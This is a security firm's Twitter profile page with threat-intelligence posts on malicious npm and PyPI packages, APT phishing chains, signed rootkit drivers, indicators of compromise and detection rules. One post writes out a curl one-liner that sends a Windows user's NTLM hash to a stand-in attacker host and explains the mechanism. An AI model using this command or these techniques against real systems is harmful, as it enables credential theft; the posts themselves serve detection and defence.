Nextron Research ⚡️ (@nextronresearch) - Twitter Profili

Sabitlenmiş Tweet

Nextron Research ⚡️@nextronresearch·18 Haz

We analyzed the top 500 most successful THOR rules – “successful” meaning: they detected samples that were either ignored or missed by nearly all AV engines on VirusTotal. Some rules detect clear malware. Others reveal dual-use tools, renamed hacktools, misused admin binaries, or forensic leftovers. Most of these samples showed 0 AV detections, the rest only minimal hits. Not all threats are payloads. Not all detections are flashy. But these rules consistently light up the blind spots in AV and EDR coverage – where attackers hide comfortably. THOR doesn’t replace existing tools. It shows you what they forgot to tell you. nextron-systems.com/2025/06/18/the…

English

4

42

127

47.6K

Nextron Research ⚡️@nextronresearch·1d

🛡️ New YARA rules for the #AtomicArch supply-chain attack ~1,500 #ArchLinux AUR packages were reportedly hijacked and backdoored to deploy a Rust infostealer and eBPF rootkit via malicious PKGBUILD install hooks invoking npm install directly or through bun. Our YARA rules detect the malicious PKGBUILD, .SRCINFO, .install files and ALPM hooks. Scan your systems for free with THOR Lite or THOR Cloud Lite 🔍 🔗 Rules: github.com/Neo23x0/signat… 📰 phoronix.com/news/Arch-Linu… 💬 discuss.cachyos.org/t/aur-compromi…

English

0

12

17

3.9K

Nextron Research ⚡️@nextronresearch·1d

🚨 New #PolinRider delivery package caught by our artifact scanner on NPM: tailwind-color-shades@1.0.2 (author: deepthought26) It's a typosquat that plants import './src/bootstrap' into index.ts → a shuffle/Function-eval loader that pulls its next stage from blockchain dead-drops (TRON→Aptos→BSC→XOR→eval), leading to Beavertail → InvisibleFerret. Same DPRK-linked operation but a newer variant: - campaign marker _V = A6-Shadow-15 - new XOR key: m6:tTh^D)cBz?NM] - new obfuscator build Package: fab731cd8005d9d73a8fe862a8bfea32c945bd957bbb9861f36401d18b878c8b Decrypted final stage: 2cfede38fb121a71a2f3607474aa8cd588a99f51b37e5e6f0d8cb789fa275032

English

0

8

15

2.9K

Nextron Research ⚡️@nextronresearch·1d

We analyzed a SideCopy (APT36 / Transparent Tribe) chain targeting Indian defense personnel A weaponized PowerPoint package posing as an internal military briefing. Same actor. New lure. The bait is a folder named "PPT for Breifing at HQ Northern Command," built around a convincing .pptx decoy and a double-extension shortcut (...pptx.lnk) carrying a shell32 icon so it reads as a normal PowerPoint to the target. Nothing is dropped to disk by the shortcut itself. The LNK kicks off a staged loader hidden inside a nested excel\ folder. Execution chain: batch/PowerShell stager opens the decoy .pptx + drops the payload → jrnswry acrhyis.exe, a .NET CrimsonRAT loader → beacons to a hardcoded C2 → remote access, recon, exfil Our @thor_scanner run produced the following YARA hits: valhalla.nextron-systems.com/info/search?ke… valhalla.nextron-systems.com/info/rule/SUSP… valhalla.nextron-systems.com/info/search?ke… valhalla.nextron-systems.com/info/rule/SUSP… Shortcut (LNK) virustotal.com/gui/file/30632… Loader (excel.bat) virustotal.com/gui/file/befcf… Payload (CrimsonRAT) virustotal.com/gui/file/abfac… Decoy PPTX virustotal.com/gui/file/853ed…

English

0

12

23

2.7K

Nextron Research ⚡️@nextronresearch·1d

Small follow-up on this Nimbus Manticore aka UNC1549 aka Smoke Sandstorm research: We continued hunting around the Ebix lure and found more Ebix-themed domains: zoom-ebix[.]com ebixexam[.]com ebix-itrack[.]com Not confirmed Nimbus Manticore infra yet. Some don’t resolve. We also found another Ebix-themed domain that looks suspicious at first glance, but we’re keeping it out of the list for now because it could also just be a badly run or auto-generated IT/vendor portal. Yes, that happens too… The funny part: one Ebix-themed login page we found seems to be a phishing-awareness page, probably created via CanIPhish for the real Ebix organization. So yes, lure-based domain hunting works. But also: don’t blindly turn every matching domain into an IOC. That’s how threat intel becomes compost

Nextron Research ⚡️@nextronresearch

Update: We identified two new UNC1549 / Nimbus Manticore phishing domains hosting the same fake Ebix recruitment portal from our previous reporting: hxxps://ebix[.]portal-career[.]com hxxps://ebix-exam[.]com IOCs and rules are available in THOR Lite and THOR Cloud Lite. Sign-up and scan your systems for free right now: thorcloud-lite.nextron-systems.com/ui/register

English

0

9

17

3.1K

Nextron Research ⚡️@nextronresearch·1d

🚨 New NPM typosquats caught by our artifact scanner: "twcompose-utils" and "classbreeze-utils" impersonating "@tailwindcss/typography". They ship the real plugin + an obfuscated dropper (AES-GCM + RC4 strings). On require() they fetch an OS-specific native 2nd-stage from 194[.]11[.]226[.]41[:]4000, drop it as a fake "GoogleUpdateService" / "WpnUserSvc.exe", run it detached, and set up Startup-folder persistence on Windows. C2: urlscan.io/ip/194.11.226.… 2nd-stage payloads (SHA-256): agent.exe e76741a1747dde6b4e4dbc88ca16fc8eb59385b6b18f6c64d1b397dfe0843647 agent-darwin-arm64 d8f8c416ebde7d90088d6029a5b9b88a2a021bf3b99896f205d78732d376ef5e agent-linux-amd64 cc5c72e90d7eda42e66a54c0197abbba1951561d3d864963b6aca7fe43a0ab06 agent-linux-arm64 22480680a22ba444a3924f906cbec947d11f011200b89ef6b67afd48b4c71d77

English

1

14

27

3.9K

Nextron Research ⚡️@nextronresearch·1d

We found a WHQL-signed kernel module that abuses Windows firmware table registration as a covert kernel↔user communication channel. Instead of exposing a device object and IOCTL interface, it registers a custom firmware provider ("BSBS"), allowing userland interaction through standard Windows firmware table APIs. The implementation is compact and stealthy, supporting memory allocation, memory copy operations, and indirect function dispatch from user mode into kernel context. An unusual example of firmware table registration being repurposed as a hidden ring3↔ring0 communication mechanism. Name: NewDriverMMM SHA256: 1d9224a72e64bb2aad289edc81ea0720c764511c3e2b5beb5d0d5ce82a719abd fdb3907ddda9ff9bd9ec4f8bd29aad823da77b5b3bf599813fecd034b0221189 SpcSpOpusInfo: 深圳市奥联信息安全技术有限公司 Telemetry: China 🇨🇳, Japan 🇯🇵

English

2

21

71

8K

Nextron Research ⚡️@nextronresearch·4d

Our Artifact Scanner flagged "pylogxo", a PyPI typosquat of "pylogx" dropping Sirkeira Stealer from 69[.]164[.]245[.]166 to harvest browser credentials, Discord, Roblox data & more. Package has been removed from PyPI but the payload is still live. pylogxo: 7089c8c1c117fa7ffdc68abe4b3c4a6f83b2b4f1827d805bf52d8705cf14eaab Stealer: 3de7ccdf0fbe423b5646640d572a8a675f275e82f38eee76e067864b9993e730 C2: urlscan.io/result/019ebae…

English

1

13

24

3.9K

Nextron Research ⚡️@nextronresearch·5d

One more malicious npm package spotted: "hex-type@3.0.2" - part of the ongoing MicrosoftSystem64 RAT campaign that exfiltrates data via HuggingFace.

Microsoft Threat Intelligence@MsftSecIntel

Compromised npm packages (utils-terminal @3.2.1, logger-active@3.2.1) are abusing Hugging Face repos as exfiltration infrastructure. The packages deploy a remote access trojan (RAT) that captures keystrokes, screenshots, and crypto wallet credentials. Indicators of compromise (IOCs): - npm user: hexalpha10 / author: toskypi - 195.201.194[.]107:8010 (WebSocket C2) - c2-toskypi.onrender[.]com (HTTP C2) - huggingface[.]co/api (exfiltration endpoint) - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftSystem64 (persistence) - MicrosoftSystem64.service (Linux systemd persistence) - \MicrosoftSystem64 (Windows scheduled task) - MicrosoftSystem64/payload.js (payload directory) Defenders: treat unexpected huggingface[.]co/api calls from non-ML workloads as suspicious.

English

0

9

31

5.6K

Nextron Research ⚡️@nextronresearch·6d

Update: We identified two new UNC1549 / Nimbus Manticore phishing domains hosting the same fake Ebix recruitment portal from our previous reporting: hxxps://ebix[.]portal-career[.]com hxxps://ebix-exam[.]com IOCs and rules are available in THOR Lite and THOR Cloud Lite. Sign-up and scan your systems for free right now: thorcloud-lite.nextron-systems.com/ui/register

Nextron Research ⚡️@nextronresearch

Detecting Nimbus Manticore (UNC1549) While previous reporting documented the threat actor’s operations, our analysis focuses on defender value: ◾ Multiple public YARA rules ◾ Campaign-specific detections ◾ Generic hunting logic ◾ IOC enrichment ◾ Detection opportunities across the full infection chain From LinkedIn lures and fake hiring portals to AppDomain hijacking, Azure infrastructure, and custom implants. Read the full research by @cod3nym: eu1.hubs.ly/H0vPgF80 #ThreatResearch #YARA #ThreatIntel

English

0

8

16

4.5K

Nextron Research ⚡️@nextronresearch·6d

🚨 Our artifact scanner detected a malicious PyPI package: "cache-compat-utils@0.1.0" (publisher: "electracrimson"). The package uses "_patch.py" as a dropper to fetch the Bun runtime from GitHub and execute "_runtime.bin". Deobfuscated, the payload is a CI/CD secret stealer + self-propagator with Shai-Hulud-style worm behavior: 🔑 Steals AWS, GitHub & npm credentials ☁️ Targets AWS IMDS, ECS, Vault & k8s tokens 🐙 Uses GitHub GraphQL + npm recon to spread virustotal.com/gui/file/95d4c…

English

1

16

39

5.1K

Nextron Research ⚡️ retweetledi

Szabolcs Schmidt@smica83·9 Haz

Related 'movie_data.msi' @abuse_ch bazaar.abuse.ch/sample/efc5f3e… FUD - 1 Thor Inside: 'svc_8xmlhr.ps1' bazaar.abuse.ch/sample/27228e1… FUD - 3 Thor @nextronresearch @cyb3rops

MalwareHunterTeam@malwrhunterteam

"SERVER": yuhvgbzsa66biqeatbmdvfo5b5jjefcmz5t2vjuvco5qtdkshfpabyid[.]onion "BUNDLE_PORT": 8443 "OPERATOR": "deus" "TAG": "msi_new1" 🤔 🤷‍♂️

Indonesia

0

4

9

5K

Nextron Research ⚡️@nextronresearch·9 Haz

Did you know curl can be used to leak your NTLM hash with a simple one-liner on your Windows machine? Mind you, curl is available on all Windows since Windows 10 / Windows Server 2019. curl -u : --ntlm attacker.com We discovered this technique being abused in recent Iranian APT campaigns of UNC1549 also known as Smoke Sandstorm and Nimbus Manticore. How it works: On Windows, curl (the included Microsoft version) uses SSPI to handle NTLM handshakes. When credentials are empty (:), curl passes NULL to AcquireCredentialsHandle - a documented SSPI behavior that tells Windows to use the current user's logon session credentials managed by LSASS, without ever touching the plaintext password. The result: your NTLMv2 response is sent straight to the attacker. For More details: #L115-L140" target="_blank" rel="nofollow noopener">github.com/curl/curl/blob… That's how a feature becomes an exploit. We published a free Sigma rule to detect this behavior: github.com/SigmaHQ/sigma/…

English

0

18

60

5.7K

Nextron Research ⚡️ retweetledi

ܛܔܔܔܛܔܛܔܛ@skocherhan·6 Haz

0f820817e2b7efac3ed127bab09b989b 2/61 Low detection #QuasarRAT variant 5 comments by @nextronresearch

English

0

2

10

578

Nextron Research ⚡️@nextronresearch·8 Haz

🚨 New Linux exfiltration tool designed to bypass EDR The malware abuses Linux io_uring to asynchronously access /etc/shadow and exfiltrate credential material over TCP with a minimal runtime footprint. Unlike traditional stealers that rely on conventional blocking I/O, it leverages kernel-managed submission and completion queues to perform stealthy file access. The sample appears optimized for rapid credential collection and exfiltration, with no significant persistence mechanisms observed. Because activity is offloaded through io_uring, it can significantly reduce visibility for monitoring solutions focused primarily on traditional syscall telemetry, making detection more challenging. Mitigation: Organizations whose security tooling lacks visibility into io_uring activity should validate coverage and consider restricting or disabling io_uring on systems where the performance tradeoff is acceptable. IOCs ea586cf89af8057ab44053cae16ea496fdb0337f88404db9618d0e0308b8a9e6 87fde30bc260a22caefc58e431e805330b5c0503ff5550ba571634756115387d

English

0

19

45

6.5K

Nextron Research ⚡️@nextronresearch·4 Haz

We analyzed a Sharp Dragon APT chain targeting Malaysian government officials A weaponized Word document posing as a US-China policy brief. Same actor. New campaign. New geography. The document is convincing, formatted as a legitimate diplomatic policy brief titled “Malaysia Policy Brief: Trump China Visit”, with a professional structure clearly designed for senior officials tracking US-China-ASEAN relations. The payload is a VBA macro that hides the embedded binary across 15 Form TextBox objects in the document’s UserForm. Nothing is dropped to disk until execution. Execution chain: VBA macro decodes the 15 TextBox chunks at runtime → assembles and drops a loader disguised as OneNote.exe → custom AES-128-ECB + LZ4 decompression, intentionally avoiding CryptoAPI → Download_s.dll beacon → HTTP GET to /microsoftonline/common/oauth2/authorize.php impersonating Microsoft → NtMapViewOfSection into rundll32.exe → Stage 4 delivered Our @thor_scanner run produced the following YARA hits: SUSP_VBA_Dropper_Feb26 valhalla.nextron-systems.com/info/rule/SUSP… APT_MAL_DLL_Loader_May24 valhalla.nextron-systems.com/info/rule/APT_… Doc sample (2/62) virustotal.com/gui/file/88b99… Second stage virustotal.com/gui/file/dccb3… Downloader (stage3) sample virustotal.com/gui/file/d0133…

English

1

20

50

5.6K

Nextron Research ⚡️ retweetledi

Marius Benthin@marius_benthin·3 Haz

Two more recently published npm packages related to the same malware campaign: "ulid-os@3.0.2" and "obfus-jsxy@3.2.0". Both detected by THOR with multiple YARA rules.

Microsoft Threat Intelligence@MsftSecIntel

Compromised npm packages (utils-terminal @3.2.1, logger-active@3.2.1) are abusing Hugging Face repos as exfiltration infrastructure. The packages deploy a remote access trojan (RAT) that captures keystrokes, screenshots, and crypto wallet credentials. Indicators of compromise (IOCs): - npm user: hexalpha10 / author: toskypi - 195.201.194[.]107:8010 (WebSocket C2) - c2-toskypi.onrender[.]com (HTTP C2) - huggingface[.]co/api (exfiltration endpoint) - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftSystem64 (persistence) - MicrosoftSystem64.service (Linux systemd persistence) - \MicrosoftSystem64 (Windows scheduled task) - MicrosoftSystem64/payload.js (payload directory) Defenders: treat unexpected huggingface[.]co/api calls from non-ML workloads as suspicious.

English

0

9

30

6K

Nextron Research ⚡️@nextronresearch·1 Haz

Detecting Nimbus Manticore (UNC1549) While previous reporting documented the threat actor’s operations, our analysis focuses on defender value: ◾ Multiple public YARA rules ◾ Campaign-specific detections ◾ Generic hunting logic ◾ IOC enrichment ◾ Detection opportunities across the full infection chain From LinkedIn lures and fake hiring portals to AppDomain hijacking, Azure infrastructure, and custom implants. Read the full research by @cod3nym: eu1.hubs.ly/H0vPgF80 #ThreatResearch #YARA #ThreatIntel

English

0

10

28

19.9K

Nextron Research ⚡️@nextronresearch·29 May

We've made it easier to deploy THOR Thunderstorm as a container by publishing a ready-to-use Docker Compose template and base image For those who haven't come across Thunderstorm before: It's our self-hosted scanning service that turns THOR into an API-driven scanning backend. Files and artifacts are collected from source systems and analyzed centrally. The interesting part is not Docker itself. The interesting part is where this becomes easier to deploy: - Edge devices and network appliances that cannot run THOR directly - Embedded and exotic operating systems - Legacy systems with limited resources - OT and critical infrastructure environments - Mail and file gateway scanning - Malware ingestion pipelines - Build and artifact scanning workflows - Supply-chain security checks Collectors can be configured to retrieve only specific file types, paths, sizes, ages or file signatures and forward them to a central Thunderstorm instance. The heavy lifting happens on the Thunderstorm server, not on the source system. And because this still causes confusion surprisingly often 😄 THOR Thunderstorm is not SaaS. The service runs in your environment. The samples stay in your environment. No files need to be uploaded to Nextron. We put together the deployment template and documentation to make this easier to test and deploy. Repository: github.com/NextronSystems…

English

0

7

13

2.8K

Nextron Research ⚡️@nextronresearch·28 May

We identified a WHQL-signed kernel driver keylogger, likely deployed as an anti-cheat BYOVD SHA256 bb1b4e46f1e4a7f17b1b04ee08c33400b2b6fd2327612a4d84da81e2656ba48b SignatureSpcSpOpusInfo=Xryus Technologies. Stealth - APIs resolution by hashing - XOR-obfuscated strings - Time-randomized paths (no IOC) Capabilities - Retrieve captured keystrokes from kernel ring buffer (cf. picture) - Pull captured mouse events ring buffer - Suppress predetermined keystrokes POC gist.github.com/pierrehpezier/…

English

2

42

161

20.7K

Nextron Research ⚡️ retweetledi

Florian Roth ⚡️@cyb3rops·22 May

The package lights up in our internal artefact monitoring like a Christmas tree 🎄 Turns out you don’t need AI 🤖 to spot this Sensitive generic YARA rules still do the job, annoyingly well

SafeDep@safedepio

🚨 The "𝙼𝚎𝚐𝚊𝚕𝚘𝚍𝚘𝚗" Campaign is live... 𝟻,𝟽𝟷𝟾 malicious commits to 𝟻,𝟻𝟼𝟷 GitHub repositories in a six-hour window. Using throwaway accounts and forged author identities (build-bot, auto-ci, ci-bot, pipeline-bot), the attacker injected 𝙶𝚒𝚝𝙷𝚞𝚋 𝙰𝚌𝚝𝚒𝚘𝚗𝚜 workflows containing 𝚋𝚊𝚜𝚎𝟼𝟺-𝚎𝚗𝚌𝚘𝚍𝚎𝚍 bash payloads that exfiltrate: - CI secrets, - cloud credentials - SSH keys - OIDC tokens - source code secrets Check your repo / Technical details: safedep.io/megalodon-mass…

English

0

15

66

10.3K

Nextron Research ⚡️

Keşfet